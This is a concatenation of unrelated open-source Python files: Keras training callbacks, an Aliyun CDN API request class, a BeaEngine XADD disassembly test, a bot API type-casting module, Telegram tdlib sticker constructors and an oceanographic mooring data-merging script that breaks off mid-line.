stopping conditioned on metric `%s` ' 'which is not available. Available metrics are: %s', self.monitor, ','.join(list(logs.keys()))) return monitor_value @keras_export('keras.callbacks.RemoteMonitor') class RemoteMonitor(Callback): """Callback used to stream events to a server. Requires the `requests` library. Events are sent to `root + '/publish/epoch/end/'` by default. Calls are HTTP POST, with a `data` argument which is a JSON-encoded dictionary of event data. If send_as_json is set to True, the content type of the request will be application/json. Otherwise the serialized JSON will be sent within a form. Arguments: root: String; root url of the target server. path: String; path relative to `root` to which the events will be sent. field: String; JSON field under which the data will be stored. The field is used only if the payload is sent within a form (i.e. send_as_json is set to False). headers: Dictionary; optional custom HTTP headers. send_as_json: Boolean; whether the request should be sent as application/json. """ def __init__(self, root='http://localhost:9000', path='/publish/epoch/end/', field='data', headers=None, send_as_json=False): super(RemoteMonitor, self).__init__() self.root = root self.path = path self.field = field self.headers = headers self.send_as_json = send_as_json def on_epoch_end(self, epoch, logs=None): if requests is None: raise ImportError('RemoteMonitor requires the `requests` library.') logs = logs or {} send = {} send['epoch'] = epoch for k, v in logs.items(): send[k] = v try: if self.send_as_json: requests.post(self.root + self.path, json=send, headers=self.headers) else: requests.post( self.root + self.path, {self.field: json.dumps(send)}, headers=self.headers) except requests.exceptions.RequestException: logging.warning('Warning: could not reach RemoteMonitor ' 'root server at ' + str(self.root)) @keras_export('keras.callbacks.LearningRateScheduler') class LearningRateScheduler(Callback): """Learning rate scheduler. Arguments: schedule: a function that takes an epoch index as input (integer, indexed from 0) and returns a new learning rate as output (float). verbose: int. 0: quiet, 1: update messages. ```python # This function keeps the learning rate at 0.001 for the first ten epochs # and decreases it exponentially after that. def scheduler(epoch): if epoch < 10: return 0.001 else: return 0.001 * tf.math.exp(0.1 * (10 - epoch)) callback = tf.keras.callbacks.LearningRateScheduler(scheduler) model.fit(data, labels, epochs=100, callbacks=[callback], validation_data=(val_data, val_labels)) ``` """ def __init__(self, schedule, verbose=0): super(LearningRateScheduler, self).__init__() self.schedule = schedule self.verbose = verbose def on_epoch_begin(self, epoch, logs=None): if not hasattr(self.model.optimizer, 'lr'): raise ValueError('Optimizer must have a "lr" attribute.') try: # new API lr = float(K.get_value(self.model.optimizer.lr)) lr = self.schedule(epoch, lr) except TypeError: # Support for old API for backward compatibility lr = self.schedule(epoch) if not isinstance(lr, (float, np.float32, np.float64)): raise ValueError('The output of the "schedule" function ' 'should be float.') K.set_value(self.model.optimizer.lr, lr) if self.verbose > 0: print('\nEpoch %05d: LearningRateScheduler reducing learning ' 'rate to %s.' % (epoch + 1, lr)) def on_epoch_end(self, epoch, logs=None): logs = logs or {} logs['lr'] = K.get_value(self.model.optimizer.lr) @keras_export('keras.callbacks.TensorBoard', v1=[]) class TensorBoard(Callback): # pylint: disable=line-too-long """Enable visualizations for TensorBoard. TensorBoard is a visualization tool provided with TensorFlow. This callback logs events for TensorBoard, including: * Metrics summary plots * Training graph visualization * Activation histograms * Sampled profiling If you have installed TensorFlow with pip, you should be able to launch TensorBoard from the command line: ```sh tensorboard --logdir=path_to_your_logs ``` You can find more information about TensorBoard [here](https://www.tensorflow.org/get_started/summaries_and_tensorboard). Arguments: log_dir: the path of the directory where to save the log files to be parsed by TensorBoard. histogram_freq: frequency (in epochs) at which to compute activation and weight histograms for the layers of the model. If set to 0, histograms won't be computed. Validation data (or split) must be specified for histogram visualizations. write_graph: whether to visualize the graph in TensorBoard. The log file can become quite large when write_graph is set to True. write_images: whether to write model weights to visualize as image in TensorBoard. update_freq: `'batch'` or `'epoch'` or integer. When using `'batch'`, writes the losses and metrics to TensorBoard after each batch. The same applies for `'epoch'`. If using an integer, let's say `1000`, the callback will write the metrics and losses to TensorBoard every 1000 samples. Note that writing too frequently to TensorBoard can slow down your training. profile_batch: Profile the batch to sample compute characteristics. By default, it will profile the second batch. Set profile_batch=0 to disable profiling. Must run in TensorFlow eager mode. embeddings_freq: frequency (in epochs) at which embedding layers will be visualized. If set to 0, embeddings won't be visualized. embeddings_metadata: a dictionary which maps layer name to a file name in which metadata for this embedding layer is saved. See the [details]( https://www.tensorflow.org/how_tos/embedding_viz/#metadata_optional) about metadata files format. In case if the same metadata file is used for all embedding layers, string can be passed. Raises: ValueError: If histogram_freq is set and no validation data is provided. """ # pylint: enable=line-too-long def __init__(self, log_dir='logs', histogram_freq=0, write_graph=True, write_images=False, update_freq='epoch', profile_batch=2, embeddings_freq=0, embeddings_metadata=None, **kwargs): super(TensorBoard, self).__init__() self._validate_kwargs(kwargs) self.log_dir = log_dir self.histogram_freq = histogram_freq self.write_graph = write_graph self.write_images = write_images if update_freq == 'batch': self.update_freq = 1 else: self.update_freq = update_freq self.embeddings_freq = embeddings_freq self.embeddings_metadata = embeddings_metadata self._samples_seen = 0 self._samples_seen_at_last_write = 0 self._current_batch = 0 self._total_batches_seen = 0 self._total_val_batches_seen = 0 # A collection of file writers currently in use, to be closed when # training ends for this callback. Writers are keyed by the # directory name under the root logdir: e.g., "train" or # "validation". self._writers = {} self._train_run_name = 'train' self._validation_run_name = 'validation' self._profile_batch = profile_batch # True when a trace is running. self._is_tracing = False # TensorBoard should only write summaries on the chief when in a # Multi-Worker setting. self._chief_worker_only = True def _validate_kwargs(self, kwargs): """Handle arguments were supported in V1.""" if kwargs.get('write_grads', False): logging.warning('`write_grads` will be ignored in TensorFlow 2.0 ' 'for the `TensorBoard` Callback.') if kwargs.get('batch_size', False): logging.warning('`batch_size` is no longer needed in the ' '`TensorBoard` Callback and will be ignored ' 'in TensorFlow 2.0.') if kwargs.get('embeddings_layer_names', False): logging.warning('`embeddings_layer_names` is not supported in ' 'TensorFlow 2.0. Instead, all `Embedding` layers ' 'will be visualized.') if kwargs.get('embeddings_data', False): logging.warning('`embeddings_data` is not supported in TensorFlow ' '2.0. Instead, all `Embedding` variables will be ' 'visualized.') unrecognized_kwargs = set(kwargs.keys()) - { 'write_grads', 'embeddings_layer_names', 'embeddings_data', 'batch_size' } # Only allow kwargs that were supported in V1. if unrecognized_kwargs: raise ValueError('Unrecognized arguments in `TensorBoard` ' 'Callback: ' + str(unrecognized_kwargs)) def set_model(self, model): """Sets Keras model and writes graph if specified.""" self.model = model with context.eager_mode(): self._close_writers() if self.write_graph: with self._get_writer(self._train_run_name).as_default(): with summary_ops_v2.always_record_summaries(): if not model.run_eagerly: summary_ops_v2.graph(K.get_graph(), step=0) summary_writable = ( self.model._is_graph_network or # pylint: disable=protected-access self.model.__class__.__name__ == 'Sequential') # pylint: disable=protected-access if summary_writable: summary_ops_v2.keras_model('keras', self.model, step=0) if self.embeddings_freq: self._configure_embeddings() def _configure_embeddings(self): """Configure the Projector for embeddings.""" # TODO(omalleyt): Add integration tests. from tensorflow.python.keras.layers import embeddings try: from tensorboard.plugins import projector except ImportError: raise ImportError('Failed to import TensorBoard. Please make sure that ' 'TensorBoard integration is complete."') config = projector.ProjectorConfig() for layer in self.model.layers: if isinstance(layer, embeddings.Embedding): embedding = config.embeddings.add() embedding.tensor_name = layer.embeddings.name if self.embeddings_metadata is not None: if isinstance(self.embeddings_metadata, str): embedding.metadata_path = self.embeddings_metadata else: if layer.name in embedding.metadata_path: embedding.metadata_path = self.embeddings_metadata.pop(layer.name) if self.embeddings_metadata: raise ValueError('Unrecognized `Embedding` layer names passed to ' '`keras.callbacks.TensorBoard` `embeddings_metadata` ' 'argument: ' + str(self.embeddings_metadata.keys())) class DummyWriter(object): """Dummy writer to conform to `Projector` API.""" def __init__(self, logdir): self.logdir = logdir def get_logdir(self): return self.logdir writer = DummyWriter(self.log_dir) projector.visualize_embeddings(writer, config) def _close_writers(self): """Close all remaining open file writers owned by this callback. If there are no such file writers, this is a no-op. """ with context.eager_mode(): for writer in six.itervalues(self._writers): writer.close() self._writers.clear() def _get_writer(self, writer_name): """Get a summary writer for the given subdirectory under the logdir. A writer will be created if it does not yet exist. Arguments: writer_name: The name of the directory for which to create or retrieve a writer. Should be either `self._train_run_name` or `self._validation_run_name`. Returns: A `SummaryWriter` object. """ if writer_name not in self._writers: path = os.path.join(self.log_dir, writer_name) writer = summary_ops_v2.create_file_writer_v2(path) self._writers[writer_name] = writer return self._writers[writer_name] def on_train_begin(self, logs=None): if self._profile_batch == 1: summary_ops_v2.trace_on(graph=True, profiler=True) self._is_tracing = True def on_batch_end(self, batch, logs=None): """Writes scalar summaries for metrics on every training batch. Performs profiling if current batch is in profiler_batches. Arguments: batch: Integer, index of batch within the current epoch. logs: Dict. Metric results for this batch. """ # Don't output batch_size and batch number as TensorBoard summaries logs = logs or {} self._samples_seen += logs.get('size', 1) samples_seen_since = self._samples_seen - self._samples_seen_at_last_write if self.update_freq != 'epoch' and samples_seen_since >= self.update_freq: self._log_metrics(logs, prefix='batch_', step=self._total_batches_seen) self._samples_seen_at_last_write = self._samples_seen self._total_batches_seen += 1 if self._is_tracing: self._log_trace() elif (not self._is_tracing and self._total_batches_seen == self._profile_batch - 1): self._enable_trace() def on_epoch_end(self, epoch, logs=None): """Runs metrics and histogram summaries at epoch end.""" step = epoch if self.update_freq == 'epoch' else self._samples_seen self._log_metrics(logs, prefix='epoch_', step=step) if self.histogram_freq and epoch % self.histogram_freq == 0: self._log_weights(epoch) if self.embeddings_freq and epoch % self.embeddings_freq == 0: self._log_embeddings(epoch) def on_train_end(self, logs=None): if self._is_tracing: self._log_trace() self._close_writers() def _enable_trace(self): if context.executing_eagerly(): summary_ops_v2.trace_on(graph=True, profiler=True) self._is_tracing = True def _log_trace(self): if context.executing_eagerly(): with self._get_writer(self._train_run_name).as_default(), \ summary_ops_v2.always_record_summaries(): # TODO(b/126388999): Remove step info in the summary name. summary_ops_v2.trace_export( name='batch_%d' % self._total_batches_seen, step=self._total_batches_seen, profiler_outdir=os.path.join(self.log_dir, 'train')) self._is_tracing = False def _log_metrics(self, logs, prefix, step): """Writes metrics out as custom scalar summaries. Arguments: logs: Dict. Keys are scalar summary names, values are NumPy scalars. prefix: String. The prefix to apply to the scalar summary names. step: Int. The global step to use for TensorBoard. """ if logs is None: logs = {} # Group metrics by the name of their associated file writer. Values # are lists of metrics, as (name, scalar_value) pairs. logs_by_writer = { self._train_run_name: [], self._validation_run_name: [], } validation_prefix = 'val_' for (name, value) in logs.items(): if name in ('batch', 'size', 'num_steps'): # Scrub non-metric items. continue if name.startswith(validation_prefix): name = name[len(validation_prefix):] writer_name = self._validation_run_name else: writer_name = self._train_run_name name = prefix + name # assign batch or epoch prefix logs_by_writer[writer_name].append((name, value)) with context.eager_mode(): with summary_ops_v2.always_record_summaries(): for writer_name in logs_by_writer: these_logs = logs_by_writer[writer_name] if not these_logs: # Don't create a "validation" events file if we don't # actually have any validation data. continue writer = self._get_writer(writer_name) with writer.as_default(): for (name, value) in these_logs: summary_ops_v2.scalar(name, value, step=step) def _log_weights(self, epoch): """Logs the weights of the Model to TensorBoard.""" writer = self._get_writer(self._train_run_name) with context.eager_mode(), \ writer.as_default(), \ summary_ops_v2.always_record_summaries(): for layer in self.model.layers: for weight in layer.weights: weight_name = weight.name.replace(':', '_') with ops.init_scope(): weight = K.get_value(weight) summary_ops_v2.histogram(weight_name, weight, step=epoch) if self.write_images: self._log_weight_as_image(weight, weight_name, epoch) writer.flush() def _log_weight_as_image(self, weight, weight_name, epoch): """Logs a weight as a TensorBoard image.""" w_img = array_ops.squeeze(weight) shape = K.int_shape(w_img) if len(shape) == 1: # Bias case w_img = array_ops.reshape(w_img, [1, shape[0], 1, 1]) elif len(shape) == 2: # Dense layer kernel case if shape[0] > shape[1]: w_img = array_ops.transpose(w_img) shape = K.int_shape(w_img) w_img = array_ops.reshape(w_img, [1, shape[0], shape[1], 1]) elif len(shape) == 3: # ConvNet case if K.image_data_format() == 'channels_last': # Switch to channels_first to display every kernel as a separate # image. w_img = array_ops.transpose(w_img, perm=[2, 0, 1]) shape = K.int_shape(w_img) w_img = array_ops.reshape(w_img, [shape[0], shape[1], shape[2], 1]) shape = K.int_shape(w_img) # Not possible to handle 3D convnets etc. if len(shape) == 4 and shape[-1] in [1, 3, 4]: summary_ops_v2.image(weight_name, w_img, step=epoch) def _log_embeddings(self, epoch): embeddings_ckpt = os.path.join(self.log_dir, 'train', 'keras_embedding.ckpt-{}'.format(epoch)) self.model.save_weights(embeddings_ckpt) @keras_export('keras.callbacks.ReduceLROnPlateau') class ReduceLROnPlateau(Callback): """Reduce learning rate when a metric has stopped improving. Models often benefit from reducing the learning rate by a factor of 2-10 once learning stagnates. This callback monitors a quantity and if no improvement is seen for a 'patience' number of epochs, the learning rate is reduced. Example: ```python reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=5, min_lr=0.001) model.fit(X_train, Y_train, callbacks=[reduce_lr]) ``` Arguments: monitor: quantity to be monitored. factor: factor by which the learning rate will be reduced. new_lr = lr * factor patience: number of epochs with no improvement after which learning rate will be reduced. verbose: int. 0: quiet, 1: update messages. mode: one of {auto, min, max}. In `min` mode, lr will be reduced when the quantity monitored has stopped decreasing; in `max` mode it will be reduced when the quantity monitored has stopped increasing; in `auto` mode, the direction is automatically inferred from the name of the monitored quantity. min_delta: threshold for measuring the new optimum, to only focus on significant changes. cooldown: number of epochs to wait before resuming normal operation after lr has been reduced. min_lr: lower bound on the learning rate. """ def __init__(self, monitor='val_loss', factor=0.1, patience=10, verbose=0, mode='auto', min_delta=1e-4, cooldown=0, min_lr=0, **kwargs): super(ReduceLROnPlateau, self).__init__() self.monitor = monitor if factor >= 1.0: raise ValueError('ReduceLROnPlateau ' 'does not support a factor >= 1.0.') if 'epsilon' in kwargs: min_delta = kwargs.pop('epsilon') logging.warning('`epsilon` argument is deprecated and ' 'will be removed, use `min_delta` instead.') self.factor = factor self.min_lr = min_lr self.min_delta = min_delta self.patience = patience self.verbose = verbose self.cooldown = cooldown self.cooldown_counter = 0 # Cooldown counter. self.wait = 0 self.best = 0 self.mode = mode self.monitor_op = None self._reset() def _reset(self): """Resets wait counter and cooldown counter. """ if self.mode not in ['auto', 'min', 'max']: logging.warning('Learning Rate Plateau Reducing mode %s is unknown, ' 'fallback to auto mode.', self.mode) self.mode = 'auto' if (self.mode == 'min' or (self.mode == 'auto' and 'acc' not in self.monitor)): self.monitor_op = lambda a, b: np.less(a, b - self.min_delta) self.best = np.Inf else: self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta) self.best = -np.Inf self.cooldown_counter = 0 self.wait = 0 def on_train_begin(self, logs=None): self._reset() def on_epoch_end(self, epoch, logs=None): logs = logs or {} logs['lr'] = K.get_value(self.model.optimizer.lr) current = logs.get(self.monitor) if current is None: logging.warning('Reduce LR on plateau conditioned on metric `%s` ' 'which is not available. Available metrics are: %s', self.monitor, ','.join(list(logs.keys()))) else: if self.in_cooldown(): self.cooldown_counter -= 1 self.wait = 0 if self.monitor_op(current, self.best): self.best = current self.wait = 0 elif not self.in_cooldown(): self.wait += 1 if self.wait >= self.patience: old_lr = float(K.get_value(self.model.optimizer.lr)) if old_lr > self.min_lr: new_lr = old_lr * self.factor new_lr = max(new_lr, self.min_lr) K.set_value(self.model.optimizer.lr, new_lr) if self.verbose > 0: print('\nEpoch %05d: ReduceLROnPlateau reducing learning ' 'rate to %s.' % (epoch + 1, new_lr)) self.cooldown_counter = self.cooldown self.wait = 0 def in_cooldown(self): return self.cooldown_counter > 0 @keras_export('keras.callbacks.CSVLogger') class CSVLogger(Callback): """Callback that streams epoch results to a csv file. Supports all values that can be represented as a string, including 1D iterables such as np.ndarray. Example: ```python csv_logger = CSVLogger('training.log') model.fit(X_train, Y_train, callbacks=[csv_logger]) ``` Arguments: filename: filename of the csv file, e.g. 'run/log.csv'. separator: string used to separate elements in the csv file. append: True: append if file exists (useful for continuing training). False: overwrite existing file, """ def __init__(self, filename, separator=',', append=False): self.sep = separator self.filename = filename self.append = append self.writer = None self.keys = None self.append_header = True if six.PY2: self.file_flags = 'b' self._open_args = {} else: self.file_flags = '' self._open_args = {'newline': '\n'} super(CSVLogger, self).__init__() def on_train_begin(self, logs=None): if self.append: if os.path.exists(self.filename): with open(self.filename, 'r' + self.file_flags) as f: self.append_header = not bool(len(f.readline())) mode = 'a' else: mode = 'w' self.csv_file = io.open(self.filename, mode + self.file_flags, **self._open_args) def on_epoch_end(self, epoch, logs=None): logs = logs or {} def handle_value(k): is_zero_dim_ndarray = isinstance(k, np.ndarray) and k.ndim == 0 if isinstance(k, six.string_types): return k elif isinstance(k, collections.Iterable) and not is_zero_dim_ndarray: return '"[%s]"' % (', '.join(map(str, k))) else: return k if self.keys is None: self.keys = sorted(logs.keys()) if self.model.stop_training: # We set NA so that csv parsers do not fail for this last epoch. logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys]) if not self.writer: class CustomDialect(csv.excel): delimiter = self.sep fieldnames = ['epoch'] + self.keys if six.PY2: fieldnames = [unicode(x) for x in fieldnames] self.writer = csv.DictWriter( self.csv_file, fieldnames=fieldnames, dialect=CustomDialect) if self.append_header: self.writer.writeheader() row_dict = collections.OrderedDict({'epoch': epoch}) row_dict.update((key, handle_value(logs[key])) for key in self.keys) self.writer.writerow(row_dict) self.csv_file.flush() def on_train_end(self, logs=None): self.csv_file.close() self.writer = None @keras_export('keras.callbacks.LambdaCallback') class LambdaCallback(Callback): r"""Callback for creating simple, custom callbacks on-the-fly. This callback is constructed with anonymous functions that will be called at the appropriate time. Note that the callbacks expects positional arguments, as: - `on_epoch_begin` and `on_epoch_end` expect two positional arguments: `epoch`, `logs` - `on_batch_begin` and `on_batch_end` expect two positional arguments: `batch`, `logs` - `on_train_begin` and `on_train_end` expect one positional argument: `logs` Arguments: on_epoch_begin: called at the beginning of every epoch. on_epoch_end: called at the end of every epoch. on_batch_begin: called at the beginning of every batch. on_batch_end: called at the end of every batch. on_train_begin: called at the beginning of model training. on_train_end: called at the end of model training. Example: ```python # Print the batch number at the beginning of every batch. batch_print_callback = LambdaCallback( on_batch_begin=lambda batch,logs: print(batch)) # Stream the epoch loss to a file in JSON format. The file content # is not well-formed JSON but rather has a JSON object per line. import json json_log = open('loss_log.json', mode='wt', buffering=1) json_logging_callback = LambdaCallback( on_epoch_end=lambda epoch, logs: json_log.write( json.dumps({'epoch': epoch, 'loss': logs['loss']}) + '\n'), on_train_end=lambda logs: json_log.close() ) # Terminate some processes after having finished model training. processes = ... cleanup_callback = LambdaCallback( on_train_end=lambda logs: [ p.terminate() for p in processes if p.is_alive()]) model.fit(..., callbacks=[batch_print_callback, json_logging_callback, cleanup_callback]) ``` """ def __init__(self, on_epoch_begin=None, on_epoch_end=None, on_batch_begin=None, on_batch_end=None, on_train_begin=None, on_train_end=None, **kwargs): super(LambdaCallback, self).__init__() self.__dict__.update(kwargs) if on_epoch_begin is not None: self.on_epoch_begin = on_epoch_begin else: self.on_epoch_begin = lambda epoch, logs: None if on_epoch_end is not None: self.on_epoch_end = on_epoch_end else: self.on_epoch_end = lambda epoch, logs: None if on_batch_begin is not None: self.on_batch_begin = on_batch_begin else: self.on_batch_begin = lambda batch, logs: None if on_batch_end is not None: self.on_batch_end = on_batch_end else: self.on_batch_end = lambda batch, logs: None if on_train_begin is not None: self.on_train_begin = on_train_begin else: self.on_train_begin = lambda logs: None if on_train_end is not None: self.on_train_end = on_train_end else: self.on_train_end = lambda logs: None
e8f99e195a00a7eb686066deabd7198bdbd95ded
0db97db08743783019efe022190f409d22ff95bd
/aliyun/api/rest/Cdn20141111DescribeCdnMonitorDataRequest.py
589fb0bb77c88eb908d460a95e93610af5c76c7d
[ "Apache-2.0" ]
permissive
snowyxx/aliyun-python-demo
8052e2a165f1b869affe632dda484d6ca203bd9b
ed40887ddff440b85b77f9b2a1fcda11cca55c8b
refs/heads/master
2021-01-10T03:37:31.657793
2016-01-21T02:03:14
2016-01-21T02:03:14
49,921,095
0
0
null
null
null
null
UTF-8
Python
false
false
398
py
''' Created by auto_sdk on 2014.11.27 ''' from aliyun.api.base import RestApi class Cdn20141111DescribeCdnMonitorDataRequest(RestApi): def __init__(self,domain='cdn.aliyuncs.com',port=80): RestApi.__init__(self,domain, port) self.DomainName = None self.EndTime = None self.StartTime = None def getapiname(self): return 'cdn.aliyuncs.com.DescribeCdnMonitorData.2014-11-11'
0f787c236ec1a8d885a4ef087fc082373227c8bc
7f523c407d45d116860eff67f079e807f2b53339
/src/third_party/beaengine/tests/0fc0.py
0ac3b3878d9ad1a76c66fa1cc72d3a95f77ed24d
[ "LGPL-3.0-only", "LGPL-2.0-or-later", "MIT" ]
permissive
0vercl0k/rp
a352c96bfe3715eb9ce8c5942831123e65289dac
b24e7f58a594aaf0ce3771745bf06862f6ecc074
refs/heads/master
2023-08-30T08:03:14.842828
2023-08-09T00:41:00
2023-08-09T00:41:00
3,554,173
1,557
239
MIT
2023-08-09T00:41:02
2012-02-26T19:26:33
C++
UTF-8
Python
false
false
2,280
py
#!/usr/bin/python # -*- coding: utf-8 -*- # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> # # @author : [email protected] from headers.BeaEnginePython import * from nose.tools import * class TestSuite: def test(self): # 0F c0 /r # XADD r/m8, r8 Buffer = bytes.fromhex('0fc09011223344') myDisasm = Disasm(Buffer) myDisasm.read() assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0') assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd') assert_equal(myDisasm.repr(), 'xadd byte ptr [rax+44332211h], dl') assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE) assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE) # REX + 0F C0 /r # XADD r/m8*, r8* Buffer = bytes.fromhex('410fc09011223344') myDisasm = Disasm(Buffer) myDisasm.read() assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0') assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd') assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE) assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE) assert_equal(myDisasm.repr(), 'xadd byte ptr [r8+44332211h], dl') # if LOCK and destination is not memory Buffer = bytes.fromhex('f00fc0c011223344') myDisasm = Disasm(Buffer) myDisasm.read() assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0') assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd') assert_equal(myDisasm.repr(), 'lock xadd al, al') assert_equal(myDisasm.infos.Reserved_.ERROR_OPCODE, UD_)
99987cf070bb316131b7d0ea14e3388a616f9a15
20be441085d9a9ae41dcf8e4dd5f416bcd3f22da
/botapi/type_cast.py
ad3483bde31f98a71ed76a913e083021fa977960
[ "Apache-2.0" ]
permissive
santarovich/botapi
928aaf48c44167b6893c51df738b9dc50873073a
dfb5161be08d0c045d70e023842144c4a18e012c
refs/heads/master
2023-03-16T10:51:00.997084
2020-12-22T09:33:44
2020-12-22T09:33:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,052
py
from datetime import datetime from typing import Any from .exceptions import TypeCastException from .serialize import SerializableModel from .types import TypedList, DateTime def type_cast(func): def wrapper(var_name: str, value: Any, *args, **kwargs): if value is None: return None return func(var_name, value, *args, **kwargs) return wrapper class TypeCast: @staticmethod @type_cast def cast(var_name: str, value: Any, var_type: Any = None, *args, **kwargs) -> Any: """ Casts the value to the new_type. If new_type is TypedList, casts every item of value to item_type if item_type is not None :param var_name: name of the attribute (used to raise errors) :param value: value to cast :param var_type: desired type :return: casted value """ if var_type is None or isinstance(value, var_type): return value elif issubclass(var_type, SerializableModel) and isinstance(value, dict): return var_type(**value) elif issubclass(var_type, datetime) and type(value) == str: return datetime.fromisoformat(value) else: raise TypeCastException(var_name, value, var_type) @staticmethod @type_cast def datetime_cast(var_name, value, date_format: str = None, *args, **kwargs): """Returns DateTime casted from value :param var_name: name of the attribute (used to raise errors) :param value: str or datetime object :param date_format: str with date format :return: DateTime """ if type(value) == str: if date_format is None: result = DateTime.fromisoformat(value) else: result = DateTime.strptime(value, date_format) elif type(value) == DateTime: result = value elif isinstance(value, datetime): result = DateTime( value.year, value.month, value.day, value.hour, value.minute, value.second, value.microsecond, value.tzinfo ) else: raise TypeCastException(var_name, value, DateTime) result.set_format(date_format=date_format) return result @staticmethod @type_cast def typed_list_cast(var_name, value, item_type=None, *args, **kwargs) -> TypedList: """Returns TypedList with type casted items :param var_name: name of the attribute (used to raise errors) :param value: iterable to cast :param item_type: type of EVERY item :return: TypedList """ if item_type is None: return TypedList(value, None) elif issubclass(item_type, SerializableModel): return TypedList([ TypeCast.cast(var_name, item, item_type) for item in value ], item_type) else: return TypedList(value, item_type)
f7503c9a867b753e4c09c2fade37efbef3ea46d8
9c73eccb0f27ee98452864e6388802e1c0a9e51c
/py_tdlib/constructors/stickers.py
4e1794bd2471db1a883cd9ab46fffe75f0da5e8d
[ "MIT" ]
permissive
Tempah28/python-tdlib
32a684cba6f5b8fcd5673d01a06f926304d29c5b
925781f2ef9e386dab437334048c798fa9cb945f
refs/heads/master
2020-03-31T00:16:06.943269
2018-10-05T14:16:12
2018-10-05T14:16:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,549
py
from ..factory import Method, Type class stickers(Type): # a list of stickers @stickers List of stickers stickers = None # type: "vector<sticker>" class getStickers(Method): # stickers from the installed sticker sets that correspond to # given emoji. If the emoji is not empty, favorite # recently used stickers may also be returned @emoji String # of emoji. If empty, returns all known installed stickers # Maximum number of stickers to be returned emoji = None # type: "string" limit = None # type: "int32" class searchStickers(Method): # for stickers from public sticker sets that correspond to # given emoji @emoji String representation of emoji; must be # @limit Maximum number of stickers to be returned emoji = None # type: "string" limit = None # type: "int32" class getRecentStickers(Method): # a list of recently used stickers @is_attached Pass true # return stickers and masks that were recently attached to # or video files; pass false to return recently sent is_attached = None # type: "Bool" class addRecentSticker(Method): # adds a new sticker to the list of recently # stickers. The new sticker is added to the top # the list. If the sticker was already in the # it is removed from the list first. Only stickers # to a sticker set can be added to this is_attached = None # type: "Bool" sticker = None # type: "InputFile" class getFavoriteStickers(Method): # favorite stickers pass
[ "andrew@localhost" ]
andrew@localhost
159c3758b380920b7b9c253c437fa4ad4939b8f9
e8e4bb89c6ce57c038de445091ddebc1c1b6eb26
/DataProcessing_1418merged/CF1_merged_reconstruction.py
207351cab222fb8c1799a14ab3f481dc095780f2
[]
no_license
ilebras/OSNAP
dc7fba846f866ec64edab35a278d2ce6c86e5f97
a5b22026351d2eb8dc4c89e2949be97122936d23
refs/heads/master
2021-05-12T16:46:18.955345
2020-09-08T23:04:23
2020-09-08T23:04:23
117,025,921
0
0
null
null
null
null
UTF-8
Python
false
false
6,880
py
from firstfuncs_1618 import * dat16=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_2016recovery_dailymerged.nc') dat16_recon=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_recon_2016recovery_dailymerged.nc') dat18=xr.open_dataset(datadir+'OSNAP2018recovery/mcat_nc/CF1_2018recovery_dailymerged.nc') def plot_overview(dat1,dat2): f,[ax1,ax2,ax3]=subplots(3,1,figsize=(12,15),sharex=True) ax1.plot(dat1.TIME,dat1.PRES) ax1.plot(dat2.TIME,dat2.PRES) ax1.invert_yaxis() ax1.set_ylabel('pressure [db]') ax2.plot(dat1.TIME,dat1.PTMP) ax2.plot(dat2.TIME,dat2.PTMP) ax2.set_ylabel('pot. temperature [$^\circ$C]') ax3.plot(dat1.TIME,dat1.PSAL) ax3.plot(dat2.TIME,dat2.PSAL) ax3.set_ylabel('practical salinity []') plot_overview(dat16_recon,dat18) savefig(figdir+'merging_overview/CF1_overview_16recon_w18.png') def TSplot(dat1,dat2): figure(figsize=(9,8)) plot(dat1.PSAL,dat1.PTMP,'o',alpha=0.3) plot(dat2.PSAL,dat2.PTMP,'o',alpha=0.3) xlabel('practical salinity []') ylabel('pot. temperature [$^\circ$C]') TSplot(dat16_recon,dat18) savefig(figdir+'merging_overview/CF1_TS_16recon_w18.png') ############################################################################# ############ The first deployment reconstruction does not look bad, ####### Going to leave as is and try something similar for the second deployment ############################################################################# # I actually only have to reconstruct the 50dbar data. def plot_diff_manyways(axx,thediff,colch,labch): axx.plot(dat18.TIME,thediff,label='',alpha=0.5,color=colch) axx.plot(dat18.resample(TIME='1M').mean(dim='TIME').TIME,thediff.resample(TIME='1M').mean(dim='TIME'),'o-',color=colch,linewidth=3,label=labch) axx.axhline(mean(thediff),color=colch) ############################################################################# ############ Reconstruct using both instruments, see how well they agree ##### Use same method as first deployment: constant t offset, monthly s offset ############################################################################# mtime=(dat18).resample(TIME='1M').mean(dim='TIME').TIME sal_mdiff={} sal_mdiff['from100']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100)).resample(TIME='1M').mean(dim='TIME') sal_mdiff['from200']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200)).resample(TIME='1M').mean(dim='TIME') sal_mdiff_fill_100=linspace(sal_mdiff['from100'][8],sal_mdiff['from100'][0],5) sal_mdiff_fill_200=linspace(sal_mdiff['from200'][8],sal_mdiff['from200'][0],5) sal_mdiff_int={} sal_mdiff_int['from100']=hstack((sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:2])) 